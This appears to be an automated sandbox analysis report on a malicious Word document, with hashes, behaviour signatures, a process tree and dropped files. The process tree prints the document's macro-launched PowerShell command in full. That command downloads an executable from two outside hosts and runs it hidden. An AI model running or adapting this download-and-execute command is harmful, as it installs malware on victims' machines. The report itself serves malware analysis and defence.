Overview

overview

10

Static

static

8

3ac85313fd...73.doc

windows7-x64

10

3ac85313fd...73.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    106s
  • max time network
    48s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    25-11-2022 09:30

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    3ac85313fd21ee48cd20576d116fb1961fd30f6aef692c50c6a041417be7da73.doc

  • Size

    78KB

  • MD5

    8d2ff5302b1a00e27fc74a4a0e7d691e

  • SHA1

    c31d9dabf66ca0bcf3d18e530bd8c659451f6867

  • SHA256

    3ac85313fd21ee48cd20576d116fb1961fd30f6aef692c50c6a041417be7da73

  • SHA512

    3021215fea7224c5fe15a7838c9353c6745bc3f0729ff8df46b77d9aa7a002214280a6056ce6bf43a0248d0bbda5a1d7a3c54e4b38ace76b52161a09ae94262f

  • SSDEEP

    1536:fvCIgb6Evkehxknn1N9AQTZZNcXlCqe8K6NV:fvCI87vhyn1NnTZZNmCqTN

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\3ac85313fd21ee48cd20576d116fb1961fd30f6aef692c50c6a041417be7da73.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1280
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1428
      • C:\Windows\SYSTEM32\WISPTIS.EXE
        "C:\Windows\SYSTEM32\WISPTIS.EXE" /ManualLaunch;
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of SetWindowsHookEx
        PID:1692
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c powershell "'powershell ""function ipxxtup([string] $plqtxd){(new-object system.net.webclient).downloadfile($plqtxd,''%tmp%\eblh.exe'');start-process ''%tmp%\eblh.exe'';}try{ipxxtup(''http://electrofluxequipmentspvtltd.com/pl.bin'')}catch{ipxxtup(''http://goloramltd.com/pl.bin'')}'"" | out-file -encoding ascii -filepath %tmp%\pbvuq.bat; start-process '%tmp%\pbvuq.bat' -windowstyle hidden"
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1300
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "'powershell ""function ipxxtup([string] $plqtxd){(new-object system.net.webclient).downloadfile($plqtxd,''C:\Users\Admin\AppData\Local\Temp\eblh.exe'');start-process ''C:\Users\Admin\AppData\Local\Temp\eblh.exe'';}try{ipxxtup(''http://electrofluxequipmentspvtltd.com/pl.bin'')}catch{ipxxtup(''http://goloramltd.com/pl.bin'')}'"" | out-file -encoding ascii -filepath C:\Users\Admin\AppData\Local\Temp\pbvuq.bat; start-process 'C:\Users\Admin\AppData\Local\Temp\pbvuq.bat' -windowstyle hidden"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1500
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\Users\Admin\AppData\Local\Temp\pbvuq.bat" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1732
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell "function ipxxtup([string] $plqtxd){(new-object system.net.webclient).downloadfile($plqtxd,'C:\Users\Admin\AppData\Local\Temp\eblh.exe');start-process 'C:\Users\Admin\AppData\Local\Temp\eblh.exe';}try{ipxxtup('http://electrofluxequipmentspvtltd.com/pl.bin')}catch{ipxxtup('http://goloramltd.com/pl.bin')}
              5⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:940

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Discovery

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\pbvuq.bat
      Filesize

      317B

      MD5

      73b9c478424c2825e98bcff8696ee9ef

      SHA1

      ecad8b9b7daca75d4ec2f5ce5d3f6d8babbd2b6f

      SHA256

      e4334b39e5468f625b31cf9597e582edfcf2b2f3bfad2bd3d6a7f704aa58e42c

      SHA512

      e06e3858c900d21aa342c7dcb14ef309f4f52e0f426f2b1a17d18ca1bb1d9c74a7a2f89050f21f1c67361c02d9803a50ae939dc3a6463965cffe356f773eecc9

      Download Submit
    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
      Filesize

      7KB

      MD5

      88d81a9ef723db8a4242327ac43c4170

      SHA1

      72b69602eeed31792a074c7cfea6e671cdce521f

      SHA256

      0027a7afda90232cb87195ed1301fc4d90a2d288359fb3b6d3dba3e5d3f60673

      SHA512

      7039d356ecc547212f0368a18316ec5be7fbf86e4a5e76550327b40c96044c0dc05c80d7e1354a5de11158a6849b8f717953564eb0696d2774dcf8ca554c5bf5

      Download Submit
    • memory/940-78-0x0000000005030000-0x000000000506C000-memory.dmp
      Filesize

      240KB

      Download
    • memory/940-77-0x000000006A580000-0x000000006AB2B000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/940-80-0x0000000005100000-0x000000000510D000-memory.dmp
      Filesize

      52KB

      Download
    • memory/940-73-0x0000000000000000-mapping.dmp
      Download
    • memory/940-82-0x000000006A580000-0x000000006AB2B000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/1280-65-0x0000000000524000-0x0000000000528000-memory.dmp
      Filesize

      16KB

      Download
    • memory/1280-54-0x00000000724D1000-0x00000000724D4000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1280-64-0x0000000000524000-0x0000000000528000-memory.dmp
      Filesize

      16KB

      Download
    • memory/1280-84-0x0000000070F3D000-0x0000000070F48000-memory.dmp
      Filesize

      44KB

      Download
    • memory/1280-62-0x0000000000524000-0x0000000000528000-memory.dmp
      Filesize

      16KB

      Download
    • memory/1280-55-0x000000006FF51000-0x000000006FF53000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1280-83-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1280-63-0x0000000000524000-0x0000000000528000-memory.dmp
      Filesize

      16KB

      Download
    • memory/1280-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1280-81-0x0000000070F3D000-0x0000000070F48000-memory.dmp
      Filesize

      44KB

      Download
    • memory/1280-57-0x0000000075601000-0x0000000075603000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1280-58-0x0000000070F3D000-0x0000000070F48000-memory.dmp
      Filesize

      44KB

      Download
    • memory/1300-66-0x0000000000000000-mapping.dmp
      Download
    • memory/1428-59-0x0000000000000000-mapping.dmp
      Download
    • memory/1428-60-0x000007FEFB9E1000-0x000007FEFB9E3000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1500-69-0x000000006A830000-0x000000006ADDB000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/1500-74-0x000000006A830000-0x000000006ADDB000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/1500-70-0x0000000004B20000-0x0000000005056000-memory.dmp
      Filesize

      5.2MB

      Download
    • memory/1500-67-0x0000000000000000-mapping.dmp
      Download
    • memory/1692-61-0x0000000000000000-mapping.dmp
      Download
    • memory/1732-71-0x0000000000000000-mapping.dmp
      Download